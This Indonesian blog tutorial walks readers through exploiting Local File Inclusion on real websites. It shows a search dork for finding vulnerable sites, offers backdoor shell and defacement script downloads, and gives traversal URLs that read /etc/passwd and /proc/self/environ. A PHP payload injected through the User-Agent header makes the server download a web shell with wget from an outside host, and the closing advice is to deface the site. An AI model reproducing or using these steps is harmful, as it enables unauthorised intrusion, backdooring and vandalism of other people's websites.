Hallo :)
Pada peluang kali ini saya bakal coba mengimplementasikan bagaimana caranya mengexploitasi terhadap website tujuan yang rentan terhadap serangan LFI atau mampu disebut termasuk bersama Local File Inclusion.
Oke tak usah berlalu-lama, kami langsung saja ya...
Hal yang pertama adalah mencari tujuan yang vulnerable terhadap serangan LFI. Kalian mampu memanfatkan search engine layaknya google, bing, atau yang lainya bersama dork, perumpamaan dorknya "index.php?file= site:com" selebihnya kembangin sendiri biar meraih yang terlalu vuln.
Tapi di sini saya sudah memiliki tujuan yang siap untuk dieksekusi, tapi saya tidak bakal saya sebutkan nama websitenya, perumpamaan tujuan saya layaknya ini...
Jika kalian belum punya Shell backdoor dan script deface kalian bisa download dulu melalui link dibawah ini :
Shell backdoor : Klik Me
Script deface : Klik Me
https://contoh.com/?file=college.php
Target sudah ada, kemudian coba ubah "college.php" bersama "../../../" perumpamaan lengkapnya bakal layaknya ini..
https://contoh.com/?file=../../../
Setelah saya klik enter, tapi di sini saya tidak meraih pesan error dengan sebutan lain hanya blank warna putih gitu. Entah ini vuln atau tidak saya termasuk agak begitu kurang paham.
Ok gamasalah, coba iseng-iseng menganti "../../../" bersama layaknya ini "/etc/passwd" perumpamaan layaknya ini...
https://contoh.com/?file=/etc/passwd
Tapi lagi-lagi di sini tidak meraih apa-apa, penampilan hanya menampkan blank warna putih, shit!
Mikir sebentar, kemudian di sini saya coba menaikan directorynya. Contoh layaknya ini..
https://contoh.com/?file=../etc/passwd > blank
https://contoh.com/?file=../../etc/passwd > lagi-lagi hanya blank
Tapi kemudian terhadap pas saya menaikan directorynya pas ke tiga, sepetti ini...
https://contoh.com/?file=../../../etc/passwd
Boom, saya berhasil membaca file etc/passwd wah mantap ini mah hhh...
Selanjutnya saya bakal coba mengecheck /proc/self/environ apakah mampu diakses atau tidak? Sekarang ubah "/etc/passwd" bersama "/proc/self/environ" selanjutnya jalankan..
https://contoh.com/?file=../../../proc/self/environ
Mantul mantap betul ternyata berhasil membaca filenya, layaknya ini...
Yeah, /proc/self/environ berhasil diakses. Tapi terkecuali kalian terhadap pas mau mengakses /proc/self/environ menampilkan halaman kosong (blank) atau tidak mampu diakses, atau barangkali itu beroperating system *BSD.
Sekarang seterusnya mari kami injeksi bersama malicious code bersama meracuni terhadap bagian http headernya. Kalian mampu mengunakan addon tamper information mozilla firefox.
Caranya membuka tamper information di mozilla firefox kemudian selanjutnya masukan url /proc/self/environ yang tadi "https://contoh.com/?file=../../../proc/self/environ" selanjutnya terhadap bagian user-agent isikian code layaknya tersebut ini...
<?system (' wget http://shellkalian.com/shell.txt -O shell.php');?>
lalu klik submit.
Ok injeksi malicious code selesai, bila berhasil letak shellnya berada terhadap directory berikut...
https://contoh.com/shell.php
Setelah Shell berhasil di akses terserah kalian mau diapain, saran mending deface saja jangan aneh-aneh kasian yang punya website:v kalau mau tebas index backup dulu ya, atau ganti saja file index.php saja.
Komentar
Posting Komentar
Berkomentar dengan baik dan dilarang mencantumkan link aktif, jika ada komentar dengan link aktif akan admin nonaktifkan.